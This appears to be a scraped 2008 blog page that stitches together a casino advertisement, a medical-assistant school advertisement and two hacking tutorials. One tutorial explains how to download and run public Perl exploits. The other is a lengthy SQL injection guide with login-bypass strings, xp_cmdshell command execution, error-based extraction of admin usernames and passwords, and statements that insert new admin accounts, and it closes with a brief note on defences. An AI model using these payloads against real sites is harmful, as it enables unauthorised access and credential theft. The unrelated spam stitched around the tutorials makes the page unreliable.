If you are want to play casino games online here at Dealem.com.au, it is a right place, they offering you an exciting, reliable and trustworthy service. Using advanced gaming software, Dealem.com.au able to bring you some of the best interactive gaming experiences available online. Playing at Dealem.com.au also allows you to take advantage of the fantastic offers they have available, which update constantly to ensure you are receiving the best promotions. Download for free and play some of your favorite online casino games like blackjack, roulette, and many more. You'll also enjoy playing Blackjack Casino, Online Poker and Online Slots. Specializing in Poker, Roulette, Slots and Blackjack, these lively casinos are the cyberspace version of a real live hotel and casino, and are a proud members of the highly esteemed Jackpot Factory Group. With high payouts, top rewards, and high betting limits, you can start playing the best online casino games in minutes.
Experience first-class online casino gambling with bonuses, promotions, and casino events. The fun and entertainment never ends here at Dealem.com.au. Challenge yourself to a wide variety of table games such Roulette, Blackjack Casino, Online Poker and Online Slots. They all offer a cheerful Welcome Bonus to all new players upon their first deposit. Plus, the casino's vast selection of over 265 amazing online casino games come side-by-side with frequent exciting promotions, where casino members stand to win even more bonuses and prizes. They offer you the winning combination of sporting fun and the thrilling chance to win. Offering their players a blast from the past but combining the perfect genuine Las Vegas gambling experience and the rocking 50s! Right from the onset, the casino management does everything possible to create a fun and unique feeling that simply cannot be beat. Should any of customers experience any problems, their support team are on hand 24/7 and you can call free or email from anywhere in the world. Join Dealem.com.au today and take advantage of special promotional offer.
Play Slots, Roulette, Poker and Blackjack Online
Posted at Tuesday, September 16, 2008Perl Tutorial Install and Runnning
Posted at Monday, September 15, 2008 Perl Tutorial Install and Runnning
Ok today I am going to show you how to use a perl exploit....
first go to
http://www.activestate.com/store/freedownload.aspx?
prdGuid=81fbce82-6bd5-49bc-a915-08d58c2648ca
And put in your info..... I might suggest not using your real name ><...
Select your download version (They do have a linux one)
Click, and download....Try to get the MSI file...Easier for installing...
on the msi just click next and what not...
Install and get ready for the next part....
Now to use an exploit, which we can get by going to milw0rm
milw0rm.com
now click on search....
if you can't find the link go to
milw0rm.com/search.php
and search perl....
now click on anyone of them....
I am going to be using
http://www.milw0rm.com/id.php?id=1489
Remember this is only for educational purposes....
I will post the code in another forum post
now open note pad and paste in the exploit....
and save it to you "perl/bin" folder...normally perl saves directly to your C Drive....
save it as
exploit.pl
and make sure to change where it "Text documents (*.txt)" to All files
MAKE SURE IT IS IN THE BIN FOLDER
now open command prompt...
and type
cd ..
then type
cd ..
now your Directory is in the c drive...
now type
cd perl\bin
and type
perl exploit.pl
and now you just follow the exploits directions and you now know how to use perl exploits...
SQL Injections Tutorial and Strings
Posted at Monday, September 15, 2008SQL Injections Tutorial and Strings
Details
1.0 Introduction
When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.
What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
What do you need?
Any web browser. Firfox runs very smoothly
What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "F0RM" tag in the HTML code. You may find something like this in some HTML codes:
code:<F0RM action=Search/search.asp method=post>[/quote]Everything between the <F0RM> and </F0RM> tags have potential parameters that might be useful (exploit wise).
<input type=hidden name=A value=C>
</F0RM>
What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:
****://duck/index.asp?id=10
How do you test if it is vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- ****://duck/index.asp?id=hi' or 1=1--
If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:
code:<F0RM action=http://duck/Search/search.asp method=post>[/quote]If luck is on your side, you will get login without any login name or password.
<input type=hidden name=A value="hi' or 1=1--">
</F0RM>
But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:
****://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.
Now, assume that we change the URL into something like this:
****://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using double quote (") if single quote (') is not working.
The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:
#tcpdump icmp
If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.
How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target IP must folder "share" sharing for Everyone.
6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:
****://duck/index.asp?id=10
We will try to UNION the integer '10' with another string from the database:
****://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".
To get the next table name, we can use the following query:
****://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
We also can search for data using LIKE keyword:
****://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5
The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".
How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:
****://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5
Now that we have the first column name, we can use NOT IN () to get the next column name:
****://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5
When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:
****://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.
Now, let's get the first login_name from the "admin_login" table:
****://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5
We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:
****://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5
We can now login as "neo" with his password "m4trix".
How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":
****://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--
We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.
To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:
****://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--
We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5
Now, you can even login as 'trinity' with the password '31173'.
How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":
****://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--
To INSERT a new record into the database:
****://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--
We can now login as "neo2" with the password of "newpas5".
How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie
For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.
Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
Here are a list of strings that you can use on a simple web page.Put them in the password bar and admin in the user name bar and then press enter, if the first one doesn't work try the next one, if non of them work, then it won't work...
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Medical Assistant School Online
Posted at Wednesday, September 10, 2008Medical Assistant perform administrative and clinical tasks to keep the offices of physicians, podiatrists, chiropractors, and other health practitioners running smoothly. They should not be confused with physician assistants, who examine, diagnose, and treat patients under the direct supervision of a physician. Medical Assistant is different than physicians' assistants. The duties of Medical Assistants vary from office to office, depending on the location and size of the practice and the practitioneris specialty. In small practices, Medical Assistant usually is generalists, handling both administrative and clinical duties and reporting directly to an office manager, physician, or other health practitioner. Those in large practices tend to specialize in a particular area, under the supervision of department administrators.
If you are interesting about your career in Medical Assistant get started with Medical Assistant School Online at St. Augustine School of Medical Assistants. According to the United States Department of Labor, Medical Assistant employment is projected to grow much faster than average, ranking medical assisting among the fastest growing occupations over the next decade. Job opportunities should be excellent, particularly for those with formal Medical Assistant training. St. Augustine School of Medical Assistants now offering formal training online with nationally accredited and certified Medical Assistant program. Their program will allow you to study online at your own pace and convenience. Most students complete the program in about 6-8 weeks. However, you can take as long as needed. There are no deadlines or time limits and their Medical Assistant training program is very affordable. So, what are you waiting for? Register online today and become a Medical Assistant that very rewarding career.